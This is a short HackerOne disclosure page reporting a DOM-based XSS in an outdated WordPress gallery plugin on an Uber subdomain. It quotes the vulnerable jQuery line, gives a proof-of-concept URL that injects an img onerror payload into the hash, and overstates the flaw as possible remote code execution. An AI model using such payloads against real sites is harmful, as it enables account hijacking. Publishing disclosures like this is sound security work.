DOM based XSS on

Disclosed: 2016-05-26 00:19:31 By blackzero To uber

Unknown

Vulnerability Details

Possible Remote code execution DOM based XSS Vuln Jquery param : var strliID=jQuery(location).attr('hash'); Target: Logged admin Go url >> https://drive.uber.com/melbourne/wp-admin/admin.php?page=Options_gallery_styles#"><img src=M onerror=alert('0wn3d');> Solution : Upgrade latest version gallery plugin (Your version v1.9.55) Test my localhost picture attached: Regards..

Actions

View on HackerOne

Report Stats

Report ID: 139875
State: Closed
Substate: informative
Upvotes: 1

DOM based XSS on

Vulnerability Details

Actions

Report Stats

Share this report